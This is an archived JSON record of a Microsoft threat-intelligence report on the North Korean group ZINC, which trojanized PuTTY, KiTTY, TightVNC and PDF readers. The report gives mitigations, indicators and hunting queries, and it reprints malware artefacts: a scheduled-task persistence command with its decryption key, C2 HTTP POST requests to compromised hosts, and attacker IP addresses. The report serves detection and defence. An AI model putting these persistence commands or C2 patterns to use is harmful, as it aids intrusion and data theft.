{ "id": "511fbce0-4446-45c8-8f34-42a35e3fbe80", "created_at": "2026-04-06T03:35:54.418487Z", "updated_at": "2026-04-10T03:38:20.52768Z", "deleted_at": null, "sha1_hash": "3ab4a20e607e8da70219a5abcea462c5d8517e20", "title": "ZINC weaponizing open-source software", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 782396, "plain_text": "ZINC weaponizing open-source software\r\nBy Microsoft Threat Intelligence, LinkedIn Threat Prevention and Defense\r\nPublished: 2022-09-29 · Archived: 2026-04-06 02:53:07 UTC\r\nApril 2023 update – Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned around the\r\ntheme of weather. ZINC is now tracked as Diamond Sleet.\r\nTo learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a complete\r\nmapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming taxonomy.\r\nIn recent months, Microsoft has detected a wide range of social engineering campaigns using weaponized legitimate open-source software by an actor we track as ZINC. Microsoft Threat Intelligence Center (MSTIC) observed activity targeting\r\nemployees in organizations across multiple industries including media, defense and aerospace, and IT services in the US,\r\nUK, India, and Russia. Based on the observed tradecraft, infrastructure, tooling, and account affiliations, MSTIC attributes\r\nthis campaign with high confidence to ZINC, a state-sponsored group based out of North Korea with objectives focused on\r\nespionage, data theft, financial gain, and network destruction.\r\nBeginning in June 2022, ZINC employed traditional social engineering tactics by initially connecting with individuals on\r\nLinkedIn to establish a level of trust with their targets. Upon successful connection, ZINC encouraged continued\r\ncommunication over WhatsApp, which acted as the means of delivery for their malicious payloads.\r\nMSTIC observed ZINC weaponizing a wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra\r\nPDF Reader, and muPDF/Subliminal Recording software installer for these attacks. ZINC was observed attempting to move\r\nlaterally and exfiltrate collected information from victim networks. The actors have successfully compromised numerous\r\norganizations since June 2022. The ongoing campaign related to the weaponized PuTTY was also reported by Mandiant\r\nearlier this month. Due to the wide use of the platforms and software that ZINC utilizes in this campaign, ZINC could pose a\r\nsignificant threat to individuals and organizations across multiple sectors and regions.\r\nMicrosoft Defender for Endpoint provides comprehensive protection against tools and custom malware used by ZINC,\r\nincluding ZetaNile. The hunting queries provided at the end of this blog will help customers comprehensively search their\r\nenvironments for relevant indicators. As with any observed nation-state actor activity, Microsoft directly notifies customers\r\nthat have been targeted or compromised, providing them with the information they need to secure their accounts. \r\nWho is ZINC? \r\nZINC is a highly operational, destructive, and sophisticated nation-state activity group. Active since 2009, the activity group\r\ngained further public notoriety in 2014 following their successful attack against Sony Pictures Entertainment. ZINC is\r\nknown to use a variety of custom remote access tools (RATs) as part of their arsenal, including those detected by Microsoft\r\nas FoggyBrass and PhantomStar.  \r\nMicrosoft researchers have observed spear-phishing as a primary tactic of ZINC actors, but they have also been observed\r\nusing strategic website compromises and social engineering across social media to achieve their objectives. ZINC targets\r\nemployees of companies it’s attempting to infiltrate and seeks to coerce these individuals into installing seemingly benign\r\nprograms or opening weaponized documents that contain malicious macros. Targeted attacks have also been carried out\r\nagainst security researchers over Twitter and LinkedIn.\r\nZINC attacks appear to be motivated by traditional cyberespionage, theft of personal and corporate data, financial gain, and\r\ncorporate network destruction. ZINC attacks bear many hallmarks of state-sponsored activities, such as heightened\r\noperational security, sophisticated malware that evolves over time, and politically motivated targeting.\r\nZINC, tracked by other security companies as Labyrinth Chollima and Black Artemis, has been observed conducting this\r\ncampaign from late April to mid-September 2022.\r\nhttps://www.microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/\r\nPage 1 of 8\n\nFigure 1. Attack flow diagram for recent ZINC campaign\r\nObserved actor activity\r\nImpersonation and establishing contact\r\nLinkedIn Threat Prevention and Defense detected ZINC creating fake profiles claiming to be recruiters working at\r\ntechnology, defense, and media entertainment companies, with the goal of moving targets away from LinkedIn and to the\r\nencrypted messaging app WhatsApp for the delivery of malware. ZINC primarily targeted engineers and technical support\r\nprofessionals working at media and information technology companies located in the UK, India, and the US. Targets\r\nreceived outreach tailored to their profession or background and were encouraged to apply for an open position at one of\r\nseveral legitimate companies. In accordance with their policies, for accounts identified in these attacks, LinkedIn quickly\r\nterminated any accounts associated with inauthentic or fraudulent behavior.\r\nFigure 2. Fraudulent recruiter profile\r\nMultiple methods used for delivery of ZetaNile\r\nMSTIC has observed at least five methods of trojanized open-source applications containing the malicious payload and\r\nshellcode that is tracked as the ZetaNile malware family. The ZetaNile implants, also known as BLINDINGCAN, have been\r\ncovered in CISA and JPCERT reports. The implant DLLs in the ZetaNile malware family are either packed with commercial\r\nsoftware protectors such as Themida and VMProtect or are encrypted using custom algorithms. The payload in the malicious\r\nDLL is decrypted using a custom key, passed as part of the DLL search order hijacking of the legitimate Windows process,\r\nas shown in Figure 3. The ZetaNile implants use unique custom encryption methods or AES encryption to generate\r\ncommand and control (C2) HTTP requests to known compromised C2 domains. By encoding the victim information in the\r\nparameters for common keywords like gametype or bbs in the HTTP POSTs, these C2 communications can blend in with\r\nlegitimate traffic.\r\nWeaponization of SSH clients\r\nOnce they have established a connection with their target, ZINC operationalized malicious versions of two SSH clients,\r\nPuTTY and KiTTY, that acted as the entry vector for the ZetaNile implant. Both utilities provide terminal emulator support\r\nfor different networking protocols, making them attractive programs for individuals commonly targeted by ZINC. The\r\nweaponized versions were often delivered as compressed ZIP archives or ISO files. Within that archive, the recipient is\r\nhttps://www.microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/\r\nPage 2 of 8\n\nprovided a ReadMe.txt and an executable file to run. As part of the evolution of ZINC’s malware development, and in an\r\neffort to evade traditional defenses, running the included executable does not drop the ZetaNile implant. For ZetaNile to be\r\ndeployed, the SSH utility requires the IP provided in the ReadMe.txt file. An example of the content of that file is provided\r\nbelow:\r\nServer: 137[.]184[.]15[.]189\r\nUser: [redacted]\r\nPass: [redacted]\r\nWeaponized PuTTY malware\r\nZINC has been using trojanized PuTTY as part of its attack chain for many years, and this most recent variant establishes\r\npersistence on compromised devices by utilizing scheduled tasks. This activity was recently reported by Mandiant. The\r\nmalicious PUTTY.exe is configured to install the Event Horizon malware in C:\\ProgramData\\colorui.dll and subsequently\r\ncopy C:\\Windows\\System32\\colorcpl.exe to C:\\ProgramData\\colorcpl.exe.  By using DLL search order hijacking, ZINC can\r\nload the second stage malware, colurui.dll, and decode the payload with the key\r\n“0CE1241A44557AA438F27BC6D4ACA246” to be used for command and control. Upon successful connection to the C2\r\nserver, the attackers can install additional malware on the compromised device for other tasks.\r\nLastly, persistence is established with the creation of a daily scheduled task, PackageColor, as part of the configuration for\r\nthe weaponized PuTTY. ZINC accomplishes this with the following command:\r\nFigure 3. PuTTY – scheduled task as part of persistence\r\nWeaponized KiTTY malware\r\nWhile ZINC has utilized weaponized PuTTY for many years, ZINC has only recently expanded their capabilities to include\r\nweaponizing a fork of PuTTY called KiTTY. The executable first collects the username and hostname of the victim system.\r\nIt then sends that information to a hardcoded IP 172[.]93[.]201[.]253 over TCP/22, which does not use SSH protocol and\r\ndoes not require SSH handshake to establish communication. Upon successful TCP connection to the server at\r\n137[.]184[.]15[.]189, the malicious KiTTY executable then deploys the malware as %AppData%\\mscoree.dll following\r\nmultiple rounds of decoding. The mscoree.dll file is the embedded payload, detected as EventHorizon, in the ZetaNile\r\nmalware family. Similar to ZINC’s version of PuTTY, the actor uses DLL search order hijacking to load malicious DLL files\r\nthat perform tasks within the context of these legitimate Windows processes, specifically through\r\n%AppData%KiTTY%PresentationHost.exe -EmbeddingObject.\r\nFigure 4. KiTTY – DLL search order hijacking\r\nThe mscoree.dll malware is modularized in such a way that, upon successful connection to the compromised C2 domain, the\r\nattackers can install additional malware on the target system as needed using the existing C2 communication, such as\r\nexecuting C:\\ProgramData\\Cisco\\fixmapi.exe -s AudioEndpointBuilder to load malicious mapistub.dll from the\r\ncompromised C2 server. The HTTP POST requests contain the hardcoded user agent string with misspelled “Edge”, as\r\ndetailed below, and contain a unique ID for the field gametype and the hardcoded value for the field type for malware\r\ncampaign tracking purposes:\r\nPOST /wp-includes/php-compat/compat.php HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39\r\nhttps://www.microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/\r\nPage 3 of 8\n\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 39\r\nHost: olidhealth[.]com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache \r\ngametype=[UniqueId]\u0026type=O8Akm8aV09Nw412KoWJds \r\nWeaponized TightVNC Viewer\r\nBeginning in September 2022, ZINC was observed utilizing a trojanized TightVNC Viewer that was delivered to a target\r\nalongside a weaponized SSH utility over WhatsApp. This malware has a unique PDBPath:\r\nN:\\2.MyDevelopment\\3.Tools_Development\\4.TightVNCCustomize\\Munna_Customize\\tightvnc\\x64\\\\Release\\tvnviewer.pdb\r\nThe weaponized versions of TightVNC Viewer often were delivered as compressed ZIP archives or job description-themed\r\nISO files via online platforms such as WhatsApp. Within that archive, the recipient is provided a ReadMe.txt and an\r\nexecutable file to run. The .txt file has the following content:\r\nPlatform: 2nd from the list\r\nUser: [redacted]\r\nPass: [redacted]\r\nAs part of the threat actor’s latest malware technique to evade traditional defenses, the malicious TightVNC Viewer has a\r\npre-populated list of remote hosts, and it’s configured to install the backdoor only when the user selects ec2-aet-tech.w-ada[.]amazonaws from the drop-down menu in the TightVNC Viewer, as shown in Figure 5:\r\nFigure 5. Weaponized TightVNC Viewer – user interface\r\nThe malware was configured to send the username and hostname to IP 44[.]238[.]74[.]84 on TCP/22 as part of the victim\r\ncheck-in with the C2 and establish VNC connections to the same IP on port TCP/5900. Once a successful connection is\r\nestablished to the server IP, the embedded second stage DLL payload from TightVNC.exe is loaded in memory to establish\r\nC2 communication to a known compromised domain.\r\nWeaponization of Sumatra PDF reader and muPDF/Subliminal Recording installer\r\nZINC has operationalized malicious versions of two PDF readers, Sumatra PDF and muPDF/Subliminal Recording installer,\r\nthat act as the entry vector for the ZetaNile implant. This delivery mechanism is often utilized in relation to fraudulent job\r\npostings delivered to job-seeking targets in the IT and defense sector. The weaponized versions were often delivered as\r\ncompressed ZIP archives. Within that archive, the recipient is provided with an executable file to run. While the malicious\r\nSumatra PDF reader is a fully functional PDF reader that can load the malicious implant from a fake PDF, the\r\nmuPDF/Subliminal Recording installer can set up the backdoor without loading any malicious PDF files.\r\nTrojanized Sumatra PDF Reader\r\nThe trojanized version of Sumatra PDF Reader named SecurePDF.exe has been utilized by ZINC since at least 2019 and\r\nremains a unique ZINC tradecraft. SecurePDF.exe is a modularized loader that can install the ZetaNile implant by loading a\r\nweaponized job application themed file with a .PDF extension. The fake PDF contains a header “SPV005”, a decryption\r\nkey, encrypted second stage implant payload, and encrypted decoy PDF, which is rendered in the Sumatra PDF Reader when\r\nthe file is opened.\r\nOnce loaded in memory, the second stage malware is configured to send the victim’s system hostname and device\r\ninformation using custom encoding algorithms to a C2 communication server as part of the C2 check-in process. The\r\nattackers can install additional malware onto the compromised devices using the C2 communication as needed.\r\nhttps://www.microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/\r\nPage 4 of 8\n\nFigure 6. SecurePDF interface\r\nTrojanized muPDF/Subliminal Recording installer\r\nWithin the trojanized version of muPDF/Subliminal Recording installer, setup.exe is configured to check if the file path\r\nISSetupPrerequisites\\Setup64.exe exists and write C:\\colrctl\\colorui.dll on disk after extracting the embedded executable\r\ninside setup.exe. It then copies C:\\Windows\\System32\\ColorCpl.exe to C:\\ColorCtrl\\ColorCpl.exe. For the second stage\r\nmalware, the malicious installer creates a new process C:\\colorctrl\\colorcpl.exe C3A9B30B6A313F289297C9A36730DB6D,\r\nand the argument C3A9B30B6A313F289297C9A36730DB6D gets passed on to colorui.dll as a decryption key. The DLL\r\ncolorui.dll, which Microsoft is tracking as the EventHorizon malware family, is injected into\r\nC:\\Windows\\System\\credwiz.exe or iexpress.exe to send C2 HTTP requests as part of the victim check-in process and to get\r\nan additional payload.\r\nPOST /support/support.asp HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;\r\nTrident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;\r\nInfoPath.3; .NET4.0C; .NET4.0E)\r\nContent-Length: 125\r\nHost: www.elite4print[.]com \r\nbbs=[encrypted payload]= \u0026article=[encrypted payload]\r\n \r\nMicrosoft will continue to monitor ZINC activity and implement protections for our customers. The current detections and\r\nIOCs in place across our security products are detailed below.\r\nRecommended customer actions\r\nThe techniques used by the actor and described in the “Observed actor activity” section can be mitigated by adopting the\r\nsecurity considerations provided below:\r\nUse the included indicators of compromise to investigate whether they exist in your environment and assess for\r\npotential intrusion.\r\nBlock in-bound traffic from IPs specified in the “Indicators of compromise” table.\r\nReview all authentication activity for remote access infrastructure, with a particular focus on accounts configured\r\nwith single factor authentication, to confirm authenticity and investigate any anomalous activity.\r\nEnable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is\r\nenforced for all remote connectivity.  NOTE: Microsoft strongly encourages all customers download and use\r\npassword-less solutions like Microsoft Authenticator to secure your accounts.\r\nEducate end users about preventing malware infections, including by ignoring or deleting unsolicited and unexpected\r\nemails with ISO attachments. Encourage end users to practice good credential hygiene—limit the use of accounts\r\nhttps://www.microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/\r\nPage 5 of 8\n\nwith local or domain admin privileges and turn on Microsoft Defender Firewall to prevent malware infection and\r\nstifle propagation.\r\nEducate end users about protecting personal and business information in social media, filtering unsolicited\r\ncommunication, identifying lures in spear-phishing email and watering holes, and reporting of reconnaissance\r\nattempts and other suspicious activity.\r\nIndicators of compromise (IOCs)\r\nThe below list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators\r\nin their environments and implement detections and protections to identify past related activity and prevent future attacks\r\nagainst their systems.\r\nIndicator Type\r\nAmazon-KiTTY.exe File name\r\nAmazon_IT_Assessment.iso File name\r\nIT_Assessment.iso File name\r\namazon_assessment_test.iso File name\r\nSecurePDF.exe File name\r\nC:\\ProgramData\\Comms\\colorui.dll File path\r\n%APPDATA%\\KiTTY\\mscoree.dll File path\r\n172.93.201[.]253 IP address\r\n137.184.15[.]189 IP address\r\n44.238.74[.]84 IP address\r\nc:\\windows\\system32\\schtasks.exe /CREATE /SC DAILY /MO 1 /ST 10:30 /TR “C:\\Windows\\System32\\cmd.exe /c start /b\r\nC:\\ProgramData\\PackageColor\\colorcpl.exe 0CE1241A44557AA438F27BC6D4ACA246” /TN PackageColor /F\r\nScheduled\r\ntask name\r\n1492fa04475b89484b5b0a02e6ba3e52544c264c294b57210404b96b65e63266 SHA-256\r\naaad412aeb0f98c2c27bb817682f08673902a48b65213091534f96fe6f5494d9 SHA-256\r\n63cddab76e9d63e3cbea421b607342735d924e462c40f3917b1b5fbdf8d4a20d SHA-256\r\ne1ecf0f7bd90553baaa83dcdc177e1d2b20d6ee5520f5d9b44cdf59389432b10 SHA-256\r\nc5a470cdf6f57125a8671f6b8843149cc78ccbc1a7bc615f34b23d9f241312bf SHA-256\r\n71beb4252e93291c7b14dfcb4cbb5d58144a76181fbe4aab3592121a3dbd9c55 SHA-256\r\nolidhealth[.]com/wp-includes/php-compat/compat.php\r\nCompromised\r\ndomain\r\nhurricanepub[.]com/include/include.php\r\nCompromised\r\ndomain\r\nhttps://www.microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/\r\nPage 6 of 8\n\nIndicator Type\r\nturnscor[.]com/wp-includes/contacts.php\r\nCompromised\r\ndomain\r\nelite4print[.]com/support/support.asp\r\nCompromised\r\ndomain\r\ncats.runtimerec[.]com/db/dbconn.php\r\nCompromised\r\ndomain\r\nrecruitment.raystechserv[.]com/lib/artichow/BarPlotDashboard.object.php\r\nCompromised\r\ndomain\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63\r\nSafari/537.36 Edg/100.0.1185.39\r\nUser agent\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR\r\n3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)\r\nUser agent\r\nN:\\2.MyDevelopment\\3.Tools_Development\\4.TightVNCCustomize\\Munna_Customize\\tightvnc\\x64\\\\Release\\tvnviewer.pdb PDBPath\r\n37e30dc2faaabaf93f0539ffbde032461ab63a2c242fbe6e1f60a22344c8a334 SHA-256\r\n14f736b7df6a35c29eaed82a47fc0a248684960aa8f2222b5ab8cdad28ead745 SHA-256\r\nNOTE: These indicators should not be considered exhaustive for this observed activity.\r\nDetections\r\nMicrosoft Defender Antivirus\r\nMicrosoft Defender Antivirus and Microsoft Defender for Endpoint customers should look for the following family names\r\nfor activity related to these attacks:\r\nZetaNile\r\nEventHorizon\r\nFoggyBrass\r\nPhantomStar\r\nMicrosoft Defender for Endpoint\r\nThe following Microsoft Defender for Endpoint alerts could indicate activity associated with this threat. These alerts,\r\nhowever, can be triggered by unrelated threat activity.\r\nSuspicious Task Scheduler activity\r\nSuspicious connection to remote service\r\nA suspicious file was observed\r\nAn executable loaded an unexpected dll\r\nPossible theft of remote session credentials\r\nSuspicious connection to remote service\r\nAdvanced hunting queries\r\nMicrosoft Sentinel\r\nMicrosoft Sentinel customers can use the following queries to look for the related malicious indicators in their\r\nenvironments.\r\nIdentify ZINC IP/domain/hash IOC\r\nThis query identifies a match across various data feeds for IP/Domain IOCs related to the Zinc actor as shared in this blog\r\npost.\r\nhttps://www.microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/\r\nPage 7 of 8\n\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Zinc Open Source/Analytic\r\nRules/ZincOctober2022_IP_Domain_Hash_IOC.yaml\r\nIdentify ZINC filename/command line IOC\r\nTo locate possible Zinc Filename/command line activity shared in the blog Microsoft Sentinel customers can use the queries\r\nbelow:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Zinc Open Source/Analytic\r\nRules/ZincOctober2022_Filename_Commandline_IOC.yaml\r\nIdentify ZINC AV hits IOC\r\nThis query looks for Microsoft Defender AV detections related to Zinc actor as shared in the blog post:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Zinc Open Source/Analytic\r\nRules/ZincOctober2022_AVHits_IOC.yaml\r\nMicrosoft 365 Defender\r\nTo locate related activity, Microsoft 365 Defender customers can run the following advanced hunting queries:\r\nSuspicious mapistub.dll file creation\r\nLook for PresentationHost.exe creating mapistub.dll, likely for use in DLL search order hijacking attacks.\r\nDeviceFileEvents\r\n| where InitiatingProcessFileName =~ \"presentationhost.exe\"\r\n| where FileName =~ \"mapistub.dll\"\r\nSuspicious mscoree.dll file creation\r\nLook instances of mscoree.dll created by PuTTY processes. \r\nDeviceFileEvents\r\n| where InitiatingProcessFileName hassuffix \"kitty.exe\" or InitiatingProcessVersionInfoInternalFileName has\r\n\"PuTTY\"\r\n| where FileName =~ \"mscoree.dll\"\r\nSuspicious colorcpl.exe image load\r\nSurface instances of the colorcpl.exe process loading colorui.dll not in an expected path, indicative of a DLL search order\r\nhijacking attack. \r\nDeviceImageLoadEvents\r\n| where InitiatingProcessFileName =~ \"colorcpl.exe\"\r\n| where FileName =~ \"colorui.dll\" and not(FolderPath has_any(\"system32\", \"syswow64\", \"program files\"))\r\nSource: https://www.microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/\r\nhttps://www.microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/" ], "report_names": [ "zinc-weaponizing-open-source-software" ], "threat_actors": [ { "id": "998746e1-b4b8-429b-a737-6eb368247c42", "created_at": "2022-10-25T16:07:23.505704Z", "updated_at": "2026-04-10T02:00:04.632806Z", "deleted_at": null, "main_name": "Covellite", "aliases": [ "Black Artemis", "CTG-2460", "Nickel Academy" ], "source_name": "ETDA:Covellite", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775446554, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3ab4a20e607e8da70219a5abcea462c5d8517e20.pdf", "text": "https://archive.orkl.eu/3ab4a20e607e8da70219a5abcea462c5d8517e20.txt", "img": "https://archive.orkl.eu/3ab4a20e607e8da70219a5abcea462c5d8517e20.jpg" } }